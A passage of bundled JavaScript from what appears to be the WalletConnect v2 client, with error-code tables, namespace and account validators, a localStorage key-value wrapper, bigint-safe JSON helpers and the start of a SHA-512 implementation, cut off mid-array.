        message: "User rejected chains.",
        code: 5001
    },
    USER_REJECTED_METHODS: {
        message: "User rejected methods.",
        code: 5002
    },
    USER_REJECTED_EVENTS: {
        message: "User rejected events.",
        code: 5003
    },
    UNSUPPORTED_CHAINS: {
        message: "Unsupported chains.",
        code: 5100
    },
    UNSUPPORTED_METHODS: {
        message: "Unsupported methods.",
        code: 5101
    },
    UNSUPPORTED_EVENTS: {
        message: "Unsupported events.",
        code: 5102
    },
    UNSUPPORTED_ACCOUNTS: {
        message: "Unsupported accounts.",
        code: 5103
    },
    UNSUPPORTED_NAMESPACE_KEY: {
        message: "Unsupported namespace key.",
        code: 5104
    },
    USER_DISCONNECTED: {
        message: "User disconnected.",
        code: 6e3
    },
    SESSION_SETTLEMENT_FAILED: {
        message: "Session settlement failed.",
        code: 7e3
    },
    WC_METHOD_UNSUPPORTED: {
        message: "Unsupported wc_ method.",
        code: 10001
    }
}, $a5d33cfc7f8e5437$var$Tt = {
    NOT_INITIALIZED: {
        message: "Not initialized.",
        code: 1
    },
    NO_MATCHING_KEY: {
        message: "No matching key.",
        code: 2
    },
    RESTORE_WILL_OVERRIDE: {
        message: "Restore will override.",
        code: 3
    },
    RESUBSCRIBED: {
        message: "Resubscribed.",
        code: 4
    },
    MISSING_OR_INVALID: {
        message: "Missing or invalid.",
        code: 5
    },
    EXPIRED: {
        message: "Expired.",
        code: 6
    },
    UNKNOWN_TYPE: {
        message: "Unknown type.",
        code: 7
    },
    MISMATCHED_TOPIC: {
        message: "Mismatched topic.",
        code: 8
    },
    NON_CONFORMING_NAMESPACES: {
        message: "Non conforming namespaces.",
        code: 9
    }
};
function $a5d33cfc7f8e5437$export$500d4c4a8fafe35(e, n) {
    const { message: t, code: r } = $a5d33cfc7f8e5437$var$Tt[e];
    return {
        message: n ? `${t} ${n}` : t,
        code: r
    };
}
function $a5d33cfc7f8e5437$export$8203ef1531c8b5b5(e, n) {
    const { message: t, code: r } = $a5d33cfc7f8e5437$var$Pt[e];
    return {
        message: n ? `${t} ${n}` : t,
        code: r
    };
}
function $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e, n) {
    return Array.isArray(e) ? typeof n < "u" && e.length ? e.every(n) : !0 : !1;
}
function $a5d33cfc7f8e5437$export$16a0268bc22b47b0(e) {
    return Object.getPrototypeOf(e) === Object.prototype && Object.keys(e).length;
}
function $a5d33cfc7f8e5437$export$fce6876652108ab(e) {
    return typeof e > "u";
}
function $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, n) {
    return n && $a5d33cfc7f8e5437$export$fce6876652108ab(e) ? !0 : typeof e == "string" && !!e.trim().length;
}
function $a5d33cfc7f8e5437$export$d6781b696a0576d1(e, n) {
    return n && $a5d33cfc7f8e5437$export$fce6876652108ab(e) ? !0 : typeof e == "number" && !isNaN(e);
}
function $a5d33cfc7f8e5437$export$6fc4971bf8f326a(e, n) {
    const { requiredNamespaces: t } = n, r = Object.keys(e.namespaces), o = Object.keys(t);
    let s = !0;
    return $a5d33cfc7f8e5437$export$1468a49de573f7f9(o, r) ? (r.forEach((i)=>{
        const { accounts: d, methods: l, events: c } = e.namespaces[i], u = $a5d33cfc7f8e5437$export$d46695d9c3664fe9(d), a = t[i];
        (!$a5d33cfc7f8e5437$export$1468a49de573f7f9($a5d33cfc7f8e5437$export$376384387cd15b27(i, a), u) || !$a5d33cfc7f8e5437$export$1468a49de573f7f9(a.methods, l) || !$a5d33cfc7f8e5437$export$1468a49de573f7f9(a.events, c)) && (s = !1);
    }), s) : !1;
}
function $a5d33cfc7f8e5437$export$e544b39f0a22e47a(e) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, !1) && e.includes(":") ? e.split(":").length === 2 : !1;
}
function $a5d33cfc7f8e5437$export$49e4a5b6862e3c71(e) {
    if ($a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, !1) && e.includes(":")) {
        const n = e.split(":");
        if (n.length === 3) {
            const t = n[0] + ":" + n[1];
            return !!n[2] && $a5d33cfc7f8e5437$export$e544b39f0a22e47a(t);
        }
    }
    return !1;
}
function $a5d33cfc7f8e5437$export$bef94a5618bf18bf(e) {
    if ($a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, !1)) try {
        return typeof new URL(e) < "u";
    } catch  {
        return !1;
    }
    return !1;
}
function $a5d33cfc7f8e5437$export$f657f7976bb2769d(e) {
    var n;
    return (n = e?.proposer) == null ? void 0 : n.publicKey;
}
function $a5d33cfc7f8e5437$export$c96d5113768aaf5e(e) {
    return e?.topic;
}
function $a5d33cfc7f8e5437$export$5e1c5c89613c213f(e, n) {
    let t = null;
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e?.publicKey, !1) || (t = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("MISSING_OR_INVALID", `${n} controller public key should be a string`)), t;
}
function $a5d33cfc7f8e5437$export$c12fced8176774f3(e) {
    let n = !0;
    return $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e) ? e.length && (n = e.every((t)=>$a5d33cfc7f8e5437$export$ee898ca48ab56c74(t, !1))) : n = !1, n;
}
function $a5d33cfc7f8e5437$export$df46c123d7e298ce(e, n, t) {
    let r = null;
    return $a5d33cfc7f8e5437$export$41dd3d480aac4a71(n) && n.length ? n.forEach((o)=>{
        r || $a5d33cfc7f8e5437$export$e544b39f0a22e47a(o) || (r = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_CHAINS", `${t}, chain ${o} should be a string and conform to "namespace:chainId" format`));
    }) : $a5d33cfc7f8e5437$export$e544b39f0a22e47a(e) || (r = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_CHAINS", `${t}, chains must be defined as "namespace:chainId" e.g. "eip155:1": {...} in the namespace key OR as an array of CAIP-2 chainIds e.g. eip155: { chains: ["eip155:1", "eip155:5"] }`)), r;
}
function $a5d33cfc7f8e5437$export$94ae96fb66f29e08(e, n, t) {
    let r = null;
    return Object.entries(e).forEach(([o, s])=>{
        if (r) return;
        const i = $a5d33cfc7f8e5437$export$df46c123d7e298ce(o, $a5d33cfc7f8e5437$export$376384387cd15b27(o, s), `${n} ${t}`);
        i && (r = i);
    }), r;
}
function $a5d33cfc7f8e5437$export$d5644026aaffb9e7(e, n) {
    let t = null;
    return $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e) ? e.forEach((r)=>{
        t || $a5d33cfc7f8e5437$export$49e4a5b6862e3c71(r) || (t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_ACCOUNTS", `${n}, account ${r} should be a string and conform to "namespace:chainId:address" format`));
    }) : t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_ACCOUNTS", `${n}, accounts should be an array of strings conforming to "namespace:chainId:address" format`), t;
}
function $a5d33cfc7f8e5437$export$2a2012e7bfa1cfb4(e, n) {
    let t = null;
    return Object.values(e).forEach((r)=>{
        if (t) return;
        const o = $a5d33cfc7f8e5437$export$d5644026aaffb9e7(r?.accounts, `${n} namespace`);
        o && (t = o);
    }), t;
}
function $a5d33cfc7f8e5437$export$b32541d63753af56(e, n) {
    let t = null;
    return $a5d33cfc7f8e5437$export$c12fced8176774f3(e?.methods) ? $a5d33cfc7f8e5437$export$c12fced8176774f3(e?.events) || (t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_EVENTS", `${n}, events should be an array of strings or empty array for no events`)) : t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_METHODS", `${n}, methods should be an array of strings or empty array for no methods`), t;
}
function $a5d33cfc7f8e5437$export$27682c78deeca9d7(e, n) {
    let t = null;
    return Object.values(e).forEach((r)=>{
        if (t) return;
        const o = $a5d33cfc7f8e5437$export$b32541d63753af56(r, `${n}, namespace`);
        o && (t = o);
    }), t;
}
function $a5d33cfc7f8e5437$export$9e2b2cae22c6a8b3(e, n, t) {
    let r = null;
    if (e && $a5d33cfc7f8e5437$export$16a0268bc22b47b0(e)) {
        const o = $a5d33cfc7f8e5437$export$27682c78deeca9d7(e, n);
        o && (r = o);
        const s = $a5d33cfc7f8e5437$export$94ae96fb66f29e08(e, n, t);
        s && (r = s);
    } else r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("MISSING_OR_INVALID", `${n}, ${t} should be an object with data`);
    return r;
}
function $a5d33cfc7f8e5437$export$93f7b81dc815a714(e, n) {
    let t = null;
    if (e && $a5d33cfc7f8e5437$export$16a0268bc22b47b0(e)) {
        const r = $a5d33cfc7f8e5437$export$27682c78deeca9d7(e, n);
        r && (t = r);
        const o = $a5d33cfc7f8e5437$export$2a2012e7bfa1cfb4(e, n);
        o && (t = o);
    } else t = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("MISSING_OR_INVALID", `${n}, namespaces should be an object with data`);
    return t;
}
function $a5d33cfc7f8e5437$export$1b3fc298be8c9a7b(e) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.protocol, !0);
}
function $a5d33cfc7f8e5437$export$6294c30b976bd21e(e, n) {
    let t = !1;
    return n && !e ? t = !0 : e && $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e) && e.length && e.forEach((r)=>{
        t = $a5d33cfc7f8e5437$export$1b3fc298be8c9a7b(r);
    }), t;
}
function $a5d33cfc7f8e5437$export$53551be28ad5e34d(e) {
    return typeof e == "number";
}
function $a5d33cfc7f8e5437$export$b3f5fcca1d210454(e) {
    return typeof e < "u" && true;
}
function $a5d33cfc7f8e5437$export$766fe78377d96f2a(e) {
    return !(!e || typeof e != "object" || !e.code || !$a5d33cfc7f8e5437$export$d6781b696a0576d1(e.code, !1) || !e.message || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.message, !1));
}
function $a5d33cfc7f8e5437$export$1a2af3c017fb6d42(e) {
    return !($a5d33cfc7f8e5437$export$fce6876652108ab(e) || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.method, !1));
}
function $a5d33cfc7f8e5437$export$1ae38cf0a848f651(e) {
    return !($a5d33cfc7f8e5437$export$fce6876652108ab(e) || $a5d33cfc7f8e5437$export$fce6876652108ab(e.result) && $a5d33cfc7f8e5437$export$fce6876652108ab(e.error) || !$a5d33cfc7f8e5437$export$d6781b696a0576d1(e.id, !1) || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.jsonrpc, !1));
}
function $a5d33cfc7f8e5437$export$cbe4cdc5960cfa11(e) {
    return !($a5d33cfc7f8e5437$export$fce6876652108ab(e) || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.name, !1));
}
function $a5d33cfc7f8e5437$export$144fc36610eb6522(e, n) {
    return !(!$a5d33cfc7f8e5437$export$e544b39f0a22e47a(n) || !$a5d33cfc7f8e5437$export$fb6db6038e742b14(e).includes(n));
}
function $a5d33cfc7f8e5437$export$8db4804e3a6de711(e, n, t) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(t, !1) ? $a5d33cfc7f8e5437$export$7dcf4808e17b15ac(e, n).includes(t) : !1;
}
function $a5d33cfc7f8e5437$export$df2c67ef8baad16b(e, n, t) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(t, !1) ? $a5d33cfc7f8e5437$export$94ee6d00e384a22(e, n).includes(t) : !1;
}
function $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4(e, n, t) {
    let r = null;
    const o = $a5d33cfc7f8e5437$var$Ht(e), s = $a5d33cfc7f8e5437$var$qt(n), i = Object.keys(o), d = Object.keys(s), l = $a5d33cfc7f8e5437$var$un(Object.keys(e)), c = $a5d33cfc7f8e5437$var$un(Object.keys(n)), u = l.filter((a)=>!c.includes(a));
    return u.length && (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces keys don't satisfy requiredNamespaces.
      Required: ${u.toString()}
      Received: ${Object.keys(n).toString()}`)), $a5d33cfc7f8e5437$export$1468a49de573f7f9(i, d) || (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces chains don't satisfy required namespaces.
      Required: ${i.toString()}
      Approved: ${d.toString()}`)), Object.keys(n).forEach((a)=>{
        if (!a.includes(":") || r) return;
        const g = $a5d33cfc7f8e5437$export$d46695d9c3664fe9(n[a].accounts);
        g.includes(a) || (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces accounts don't satisfy namespace accounts for ${a}
        Required: ${a}
        Approved: ${g.toString()}`));
    }), i.forEach((a)=>{
        r || ($a5d33cfc7f8e5437$export$1468a49de573f7f9(o[a].methods, s[a].methods) ? $a5d33cfc7f8e5437$export$1468a49de573f7f9(o[a].events, s[a].events) || (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces events don't satisfy namespace events for ${a}`)) : r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces methods don't satisfy namespace methods for ${a}`));
    }), r;
}
function $a5d33cfc7f8e5437$var$Ht(e) {
    const n = {};
    return Object.keys(e).forEach((t)=>{
        var r;
        t.includes(":") ? n[t] = e[t] : (r = e[t].chains) == null || r.forEach((o)=>{
            n[o] = {
                methods: e[t].methods,
                events: e[t].events
            };
        });
    }), n;
}
function $a5d33cfc7f8e5437$var$un(e) {
    return [
        ...new Set(e.map((n)=>n.includes(":") ? n.split(":")[0] : n))
    ];
}
function $a5d33cfc7f8e5437$var$qt(e) {
    const n = {};
    return Object.keys(e).forEach((t)=>{
        if (t.includes(":")) n[t] = e[t];
        else {
            const r = $a5d33cfc7f8e5437$export$d46695d9c3664fe9(e[t].accounts);
            r?.forEach((o)=>{
                n[o] = {
                    accounts: e[t].accounts.filter((s)=>s.includes(`${o}:`)),
                    methods: e[t].methods,
                    events: e[t].events
                };
            });
        }
    }), n;
}
function $a5d33cfc7f8e5437$export$59fba2af1ac782b(e, n) {
    return $a5d33cfc7f8e5437$export$d6781b696a0576d1(e, !1) && e <= n.max && e >= n.min;
}



var $7etJZ = parcelRequire("7etJZ");
var $62fc2f1c5fb46a11$exports = {};
"use strict";
Object.defineProperty($62fc2f1c5fb46a11$exports, "__esModule", {
    value: true
});
$62fc2f1c5fb46a11$exports.KeyValueStorage = void 0;

var $7WQrb = parcelRequire("7WQrb");

var $lT07n = parcelRequire("lT07n");

const $62fc2f1c5fb46a11$var$localStorage_1 = $7WQrb.__importDefault((parcelRequire("bKt7V")));
var $b43df25cddcbdec8$exports = {};
"use strict";
Object.defineProperty($b43df25cddcbdec8$exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("57Lgo")), $b43df25cddcbdec8$exports);

$7WQrb.__exportStar((parcelRequire("3ycQJ")), $b43df25cddcbdec8$exports);


class $62fc2f1c5fb46a11$var$KeyValueStorage {
    constructor(){
        this.localStorage = $62fc2f1c5fb46a11$var$localStorage_1.default;
    }
    getKeys() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            return Object.keys(this.localStorage);
        });
    }
    getEntries() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            return Object.entries(this.localStorage).map($b43df25cddcbdec8$exports.parseEntry);
        });
    }
    getItem(key) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            const item = this.localStorage.getItem(key);
            if (item === null) return undefined;
            return $lT07n.safeJsonParse(item);
        });
    }
    setItem(key, value) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            this.localStorage.setItem(key, $lT07n.safeJsonStringify(value));
        });
    }
    removeItem(key) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            this.localStorage.removeItem(key);
        });
    }
}
$62fc2f1c5fb46a11$exports.KeyValueStorage = $62fc2f1c5fb46a11$var$KeyValueStorage;
$62fc2f1c5fb46a11$exports.default = $62fc2f1c5fb46a11$var$KeyValueStorage;


var $212993b948b3fe4b$exports = {};
"use strict";
Object.defineProperty($212993b948b3fe4b$exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("48YDT")), $212993b948b3fe4b$exports);

$7WQrb.__exportStar((parcelRequire("5nu18")), $212993b948b3fe4b$exports);

$7WQrb.__exportStar((parcelRequire("1nGZv")), $212993b948b3fe4b$exports);


var $7fc0ce2591a9daef$exports = {};
"use strict";
Object.defineProperty($7fc0ce2591a9daef$exports, "__esModule", {
    value: true
});
$7fc0ce2591a9daef$exports.pino = void 0;

var $7WQrb = parcelRequire("7WQrb");

const $7fc0ce2591a9daef$var$pino_1 = $7WQrb.__importDefault((parcelRequire("kgxrf")));
Object.defineProperty($7fc0ce2591a9daef$exports, "pino", {
    enumerable: true,
    get: function() {
        return $7fc0ce2591a9daef$var$pino_1.default;
    }
});

$7WQrb.__exportStar((parcelRequire("glyO2")), $7fc0ce2591a9daef$exports);

$7WQrb.__exportStar((parcelRequire("cyyD4")), $7fc0ce2591a9daef$exports);


parcelRequire("37EVq");
var $3VSyk = parcelRequire("3VSyk");

var $7etJZ = parcelRequire("7etJZ");
class $bace94c1ef08d1bc$export$ed533416df113881 extends (0, $3VSyk.IEvents) {
    constructor(s){
        super(), this.opts = s, this.protocol = "wc", this.version = 2;
    }
}
class $bace94c1ef08d1bc$export$a4e7e56f03915894 {
    constructor(s, t, o){
        this.core = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$45b2c2643615b67 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.core = s, this.logger = t, this.records = new Map;
    }
}
class $bace94c1ef08d1bc$export$e67570fe0a885c47 {
    constructor(s, t){
        this.logger = s, this.core = t;
    }
}
class $bace94c1ef08d1bc$export$3b0872bbd7e675a2 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.relayer = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$9a0f755fd4f79434 extends (0, $3VSyk.IEvents) {
    constructor(s){
        super();
    }
}
class $bace94c1ef08d1bc$export$a7f17ba6c54777e7 {
    constructor(s, t, o, w){
        this.core = s, this.logger = t, this.name = o;
    }
}
class $bace94c1ef08d1bc$export$5746ea6dad01660a {
    constructor(){
        this.map = new Map;
    }
}
class $bace94c1ef08d1bc$export$300eed987e764b57 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.relayer = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$be56d986c75c3691 {
    constructor(s, t){
        this.core = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$41aaa3c39f6f2861 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.core = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$d6c2d698ffb743f1 {
    constructor(s, t){
        this.logger = s, this.core = t;
    }
}
class $bace94c1ef08d1bc$export$873b0b865d85ddb6 {
    constructor(s, t){
        this.projectId = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$235ef727e8a26483 extends (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))) {
    constructor(){
        super();
    }
}
class $bace94c1ef08d1bc$export$2ebcf6eeacedad44 {
    constructor(s){
        this.opts = s, this.protocol = "wc", this.version = 2;
    }
}
class $bace94c1ef08d1bc$export$623dd0f793f15643 extends (0, $7etJZ.EventEmitter) {
    constructor(){
        super();
    }
}
class $bace94c1ef08d1bc$export$87df43c730effa30 {
    constructor(s){
        this.client = s;
    }
}


const $81c2e06d24b89184$var$JSONStringify = (data)=>JSON.stringify(data, (_, value)=>typeof value === "bigint" ? value.toString() + "n" : value);
const $81c2e06d24b89184$var$JSONParse = (json)=>{
    const numbersBiggerThanMaxInt = /([\[:])?(\d{17,}|(?:[9](?:[1-9]07199254740991|0[1-9]7199254740991|00[8-9]199254740991|007[2-9]99254740991|007199[3-9]54740991|0071992[6-9]4740991|00719925[5-9]740991|007199254[8-9]40991|0071992547[5-9]0991|00719925474[1-9]991|00719925474099[2-9])))([,\}\]])/g;
    const serializedData = json.replace(numbersBiggerThanMaxInt, '$1"$2n"$3');
    return JSON.parse(serializedData, (_, value)=>{
        const isCustomFormatBigInt = typeof value === "string" && value.match(/^\d+n$/);
        if (isCustomFormatBigInt) return BigInt(value.substring(0, value.length - 1));
        return value;
    });
};
function $81c2e06d24b89184$export$84137bb44359aed5(value) {
    if (typeof value !== "string") throw new Error(`Cannot safe json parse value of type ${typeof value}`);
    try {
        return $81c2e06d24b89184$var$JSONParse(value);
    } catch (_a) {
        return value;
    }
}
function $81c2e06d24b89184$export$abc3f407e87918a4(value) {
    return typeof value === "string" ? value : $81c2e06d24b89184$var$JSONStringify(value) || "";
}


var $b9995ea5f865dc88$exports = {};
$parcel$export($b9995ea5f865dc88$exports, "generateKeyPair", () => $2281914794d9e636$export$a949d36eab55b41f);
$parcel$export($b9995ea5f865dc88$exports, "signJWT", () => $2281914794d9e636$export$a8dda30659d36d45);
$parcel$export($b9995ea5f865dc88$exports, "encodeIss", () => $f6e90d472e8dfc29$export$1b29ef9371459e10);
var $a1d7ebd43ba0a83c$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($a1d7ebd43ba0a83c$exports, "__esModule", {
    value: true
});
$a1d7ebd43ba0a83c$exports.convertSecretKeyToX25519 = $a1d7ebd43ba0a83c$exports.convertPublicKeyToX25519 = $a1d7ebd43ba0a83c$exports.verify = $a1d7ebd43ba0a83c$exports.sign = $a1d7ebd43ba0a83c$exports.extractPublicKeyFromSecretKey = $a1d7ebd43ba0a83c$exports.generateKeyPair = $a1d7ebd43ba0a83c$exports.generateKeyPairFromSeed = $a1d7ebd43ba0a83c$exports.SEED_LENGTH = $a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH = $a1d7ebd43ba0a83c$exports.PUBLIC_KEY_LENGTH = $a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH = void 0;

var $2cc6b12a8ccb780d$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($2cc6b12a8ccb780d$exports, "__esModule", {
    value: true
});


$2cc6b12a8ccb780d$exports.DIGEST_LENGTH = 64;
$2cc6b12a8ccb780d$exports.BLOCK_SIZE = 128;
/**
 * SHA-2-512 cryptographic hash algorithm.
 */ var $2cc6b12a8ccb780d$var$SHA512 = /** @class */ function() {
    function SHA512() {
        /** Length of hash output */ this.digestLength = $2cc6b12a8ccb780d$exports.DIGEST_LENGTH;
        /** Block size */ this.blockSize = $2cc6b12a8ccb780d$exports.BLOCK_SIZE;
        // Note: Int32Array is used instead of Uint32Array for performance reasons.
        this._stateHi = new Int32Array(8); // hash state, high bytes
        this._stateLo = new Int32Array(8); // hash state, low bytes
        this._tempHi = new Int32Array(16); // temporary state, high bytes
        this._tempLo = new Int32Array(16); // temporary state, low bytes
        this._buffer = new Uint8Array(256); // buffer for data to hash
        this._bufferLength = 0; // number of bytes in buffer
        this._bytesHashed = 0; // number of total bytes hashed
        this._finished = false; // indicates whether the hash was finalized
        this.reset();
    }
    SHA512.prototype._initState = function() {
        this._stateHi[0] = 0x6a09e667;
        this._stateHi[1] = 0xbb67ae85;
        this._stateHi[2] = 0x3c6ef372;
        this._stateHi[3] = 0xa54ff53a;
        this._stateHi[4] = 0x510e527f;
        this._stateHi[5] = 0x9b05688c;
        this._stateHi[6] = 0x1f83d9ab;
        this._stateHi[7] = 0x5be0cd19;
        this._stateLo[0] = 0xf3bcc908;
        this._stateLo[1] = 0x84caa73b;
        this._stateLo[2] = 0xfe94f82b;
        this._stateLo[3] = 0x5f1d36f1;
        this._stateLo[4] = 0xade682d1;
        this._stateLo[5] = 0x2b3e6c1f;
        this._stateLo[6] = 0xfb41bd6b;
        this._stateLo[7] = 0x137e2179;
    };
    /**
     * Resets hash state making it possible
     * to re-use this instance to hash other data.
     */ SHA512.prototype.reset = function() {
        this._initState();
        this._bufferLength = 0;
        this._bytesHashed = 0;
        this._finished = false;
        return this;
    };
    /**
     * Cleans internal buffers and resets hash state.
     */ SHA512.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._tempHi);
        $276678191c4bdb56$exports.wipe(this._tempLo);
        this.reset();
    };
    /**
     * Updates hash state with the given data.
     *
     * Throws error when trying to update already finalized hash:
     * instance must be reset to update it again.
     */ SHA512.prototype.update = function(data, dataLength) {
        if (dataLength === void 0) dataLength = data.length;
        if (this._finished) throw new Error("SHA512: can't update because hash was finished.");
        var dataPos = 0;
        this._bytesHashed += dataLength;
        if (this._bufferLength > 0) {
            while(this._bufferLength < $2cc6b12a8ccb780d$exports.BLOCK_SIZE && dataLength > 0){
                this._buffer[this._bufferLength++] = data[dataPos++];
                dataLength--;
            }
            if (this._bufferLength === this.blockSize) {
                $2cc6b12a8ccb780d$var$hashBlocks(this._tempHi, this._tempLo, this._stateHi, this._stateLo, this._buffer, 0, this.blockSize);
                this._bufferLength = 0;
            }
        }
        if (dataLength >= this.blockSize) {
            dataPos = $2cc6b12a8ccb780d$var$hashBlocks(this._tempHi, this._tempLo, this._stateHi, this._stateLo, data, dataPos, dataLength);
            dataLength %= this.blockSize;
        }
        while(dataLength > 0){
            this._buffer[this._bufferLength++] = data[dataPos++];
            dataLength--;
        }
        return this;
    };
    /**
     * Finalizes hash state and puts hash into out.
     * If hash was already finalized, puts the same value.
     */ SHA512.prototype.finish = function(out) {
        if (!this._finished) {
            var bytesHashed = this._bytesHashed;
            var left = this._bufferLength;
            var bitLenHi = bytesHashed / 0x20000000 | 0;
            var bitLenLo = bytesHashed << 3;
            var padLength = bytesHashed % 128 < 112 ? 128 : 256;
            this._buffer[left] = 0x80;
            for(var i = left + 1; i < padLength - 8; i++)this._buffer[i] = 0;
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenHi, this._buffer, padLength - 8);
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenLo, this._buffer, padLength - 4);
            $2cc6b12a8ccb780d$var$hashBlocks(this._tempHi, this._tempLo, this._stateHi, this._stateLo, this._buffer, 0, padLength);
            this._finished = true;
        }
        for(var i = 0; i < this.digestLength / 8; i++){
            $ddd89ca0ca71c6d3$exports.writeUint32BE(this._stateHi[i], out, i * 8);
            $ddd89ca0ca71c6d3$exports.writeUint32BE(this._stateLo[i], out, i * 8 + 4);
        }
        return this;
    };
    /**
     * Returns the final hash digest.
     */ SHA512.prototype.digest = function() {
        var out = new Uint8Array(this.digestLength);
        this.finish(out);
        return out;
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization. Returns hash state to be
     * used with restoreState(). Only chain value is saved, not buffers or
     * other state variables.
     */ SHA512.prototype.saveState = function() {
        if (this._finished) throw new Error("SHA256: cannot save finished state");
        return {
            stateHi: new Int32Array(this._stateHi),
            stateLo: new Int32Array(this._stateLo),
            buffer: this._bufferLength > 0 ? new Uint8Array(this._buffer) : undefined,
            bufferLength: this._bufferLength,
            bytesHashed: this._bytesHashed
        };
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization. Restores state saved by
     * saveState() and sets bytesHashed to the given value.
     */ SHA512.prototype.restoreState = function(savedState) {
        this._stateHi.set(savedState.stateHi);
        this._stateLo.set(savedState.stateLo);
        this._bufferLength = savedState.bufferLength;
        if (savedState.buffer) this._buffer.set(savedState.buffer);
        this._bytesHashed = savedState.bytesHashed;
        this._finished = false;
        return this;
    };
    /**
     * Cleans state returned by saveState().
     */ SHA512.prototype.cleanSavedState = function(savedState) {
        $276678191c4bdb56$exports.wipe(savedState.stateHi);
        $276678191c4bdb56$exports.wipe(savedState.stateLo);
        if (savedState.buffer) $276678191c4bdb56$exports.wipe(savedState.buffer);
        savedState.bufferLength = 0;
        savedState.bytesHashed = 0;
    };
    return SHA512;
}();
$2cc6b12a8ccb780d$exports.SHA512 = $2cc6b12a8ccb780d$var$SHA512;
// Constants
var $2cc6b12a8ccb780d$var$K = new Int32Array([
    0x428a2f98,
    0xd728ae22,
    0x71374491,
    0x23ef65cd,
    0xb5c0fbcf,
    0xec4d3b2f,
    0xe9b5dba5,
    0x8189dbbc,
    0x3956c25b,
    0xf348b538,
    0x59f111f1,
    0xb605d019,
    0x923f82a4,
    0xaf194f9b,
    0xab1c5ed5,
    0xda6d8118,
    0xd807aa98,
    0xa3030242,
    0x12835b01,
    0x45706fbe,
    0x243185be,
    0x4ee4b28c,
    0x550c7dc3,
    0xd5ffb4e2,
    0x72be5d74,
    0xf27b896f,
    0x80deb1fe,
    0x3b1696b1,
    0x9bdc06a7,
    0x25c71235,
    0xc19bf174,
    0xcf692694,
    0xe49b69c1,
    0x9ef14ad2,
    0xefbe4786,
    0x384f25e3,
    0x0fc19dc6,
    0x8b8cd5b5,
    0x240ca1cc,
    0x77ac9c65,
    0x2de92c6f,
    0x592b0275,
    0x4a7484aa,
    0x6ea6e483,
    0x5cb0a9dc,
    0xbd41fbd4,
    0x76f988da,
    0x831153b5,
    0x983e5152,
    0xee66dfab,
    0xa831c66d,
    0x2db43210,
    0xb00327c8,
    0x98fb213f,
    0xbf597fc7,
    0xbeef0ee4,
    0xc6e00bf3,
    0x3da88fc2,
    0xd5a79147,
    0x930aa725,
    0x06ca6351,
    0xe003826f,
    0x14292967,
    0x0a0e6e70,
    0x27b70a85,
    0x46d22ffc,
    0x2e1b2138,
    0x5c26c926,
    0x4d2c6dfc,
    0x5ac42aed,
    0x53380d13,
    0x9d95b3df,
    0x650a7354,
    0x8baf63de,
    0x766a0abb,
    0x3c77b2a8,
    0x81c2c92e,
    0x47edaee6,
    0x92722c85,
